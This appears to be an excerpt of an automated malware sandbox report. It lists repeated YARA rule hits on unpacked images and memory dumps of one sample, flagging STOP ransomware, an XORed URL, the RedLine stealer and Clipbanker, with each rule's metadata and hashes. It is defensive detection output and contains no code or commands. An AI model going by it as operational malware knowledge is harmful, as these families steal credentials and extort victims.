Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.343989029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.350733876.0000000002105000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000006.00000000.321377469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
